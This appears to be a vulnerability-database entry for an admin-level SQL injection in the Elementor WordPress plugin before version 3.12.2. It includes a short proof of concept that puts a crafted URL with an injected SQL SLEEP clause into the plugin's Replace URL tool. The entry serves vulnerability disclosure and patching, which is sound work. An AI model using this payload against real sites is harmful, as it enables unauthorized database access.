Lucene search

K

Elementor Website Builder < 3.12.2 - Admin+ SQLi

🗓️ 02 May 2023 00:00:00Reported by Sanjay DasType 
wpexploit
 wpexploit
👁 645 Views

Elementor website builder SQL injection vulnerability through admin+ sectio

Show more
Related
Code
1. Go to Elementor > Tools > Replace URL
2. Fill the first field with `http://localhost:8000/`
3. Fill the second field with `http://localhost:8000/?test'),meta_key='key4'where+meta_id=SLEEP(2);#`
4. Note the additional time taken by the request, demonstrating the SQL injection vulnerability.

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
02 May 2023 00:00Current
7.3High risk
Vulners AI Score7.3
EPSS0.002
645
.json
Report